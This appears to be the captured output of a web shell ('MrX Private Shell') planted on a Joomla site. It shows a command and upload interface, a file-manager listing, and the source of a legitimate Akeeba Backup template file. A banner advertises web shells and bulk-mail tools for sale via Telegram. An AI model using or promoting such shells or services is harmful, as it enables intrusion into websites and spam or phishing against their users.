__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

[email protected]: ~ $
<?php
/**
 * @package   akeebabackup
 * @copyright Copyright (c)2006-2024 Nicholas K. Dionysopoulos / Akeeba Ltd
 * @license   GNU General Public License version 3, or later
 */

// Protect from unauthorized access
defined('_JEXEC') || die();

use Joomla\CMS\Language\Text;

/** @var  $this  \Akeeba\Component\AkeebaBackup\Administrator\View\Transfer\HtmlView */
?>

<?php if ($this->force): ?>
	<div class="alert alert-warning">
		<h3>
			<?= Text::_('COM_AKEEBABACKUP_TRANSFER_FORCE_HEADER') ?>
		</h3>
		<p>
			<?= Text::_('COM_AKEEBABACKUP_TRANSFER_FORCE_BODY') ?>
		</p>
	</div>
<?php endif ?>

<?= $this->loadTemplate('prerequisites') ?>

<?php if (!empty($this->latestBackup)): ?>
	<?= $this->loadTemplate('remoteconnection') ?>
	<?= $this->loadTemplate('manualtransfer') ?>
	<?= $this->loadTemplate('upload') ?>
<?php endif; ?>

Filemanager

Name Type Size Permission Actions
default.php File 836 B 0664
default.xml File 383 B 0664
default_manualtransfer.php File 2.2 KB 0664
default_prerequisites.php File 1.84 KB 0664
default_remoteconnection.php File 10.76 KB 0664
default_upload.php File 2.29 KB 0664
Filemanager